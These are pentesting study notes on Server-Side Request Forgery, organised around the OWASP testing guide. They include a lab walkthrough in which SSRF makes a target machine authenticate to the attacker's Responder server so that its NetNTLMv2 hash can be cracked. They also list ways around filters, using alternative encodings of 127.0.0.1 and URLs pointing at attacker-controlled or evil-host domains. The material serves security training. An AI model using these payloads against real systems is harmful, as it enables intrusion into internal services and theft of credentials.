SSRF attack - Server Side Request Forgery
OWASP
OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery
| ID | Link to Hackinglife | Link to OWASP | Description |
|---|---|---|---|
| 7.19 | WSTG-INPV-19 | Testing for Server-Side Request Forgery | - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. |
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker could create a request to internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an atacker to:
- Take control of a remote machine.
- Read or update data.
- Read the server configuration.
- Connect to internal services...
With:
Exploitation
Load the Contents of a File
Read files from restricted resources
Read files from other backend systems
In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.
Gopherus sends non authenticated requests to other services and it succeded.
Trigger a WebDAV authentication and capture NTMLv2
Complete walkthrough at OSCP Heist - A Playground Practice machine
Navigate to http://192.168.110.165:8080/ .
Set a listener in the attacker machine:
Launch the browser:
![[heist_00.png]]
There is a request in the listener:
![[heist_01.png]]
There is a Server Side Request Forgery vulnerability. However there is no execution on the server. By serving a bind or reverse shell the tester can obtain execution on their own attacker machine, never on the server one.
However, it's possible to make the target server to authenticate to the attacker machine exploiting this SSRF:
Set a responder server in the attacker machine:
Trigger the SSRF vulnerability by navigating to http://192.168.207.165:8080/?url=http%3A%2F%2F192.168.45.154:80
where 192.168.207.165 is the target machine and 192.168.45.154 the kali attacker machine.
Responder output:
The NetNTLMv2 includes both the challenge (random text) and the encrypted response.
Crack it offline:
Techniques
Bypass blacklist-based input filters
Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:
- Use an alternative IP representation of
127.0.0.1, such as2130706433,017700000001, or127.1. - Register your own domain name that resolves to
127.0.0.1. You can usespoofed.burpcollaborator.netfor this purpose. - Obfuscate blocked strings using URL encoding or case variation.
- Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an
http:tohttps:URL during the redirect has been shown to bypass some anti-SSRF filters.
Bypass whitelist-based input filters
Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.
- Using the
@character to separate between the userinfo and the host: `https://expected-host:fakepassword@evil-host - URL fragmentation with the
#character:https://attacker-domain#expected-domain - You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: -
https://expected-host.evil-host - URL encoding. Double URL-encode characters to confuse the URL-parsing code.
- Fuzzing
- Combinations of all of the above
Exploiting redirection vulnerabilities
It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.
Resources
Tools and payloads
- See updated chart: Attacks and tools for web pentesting.
- Gopherus.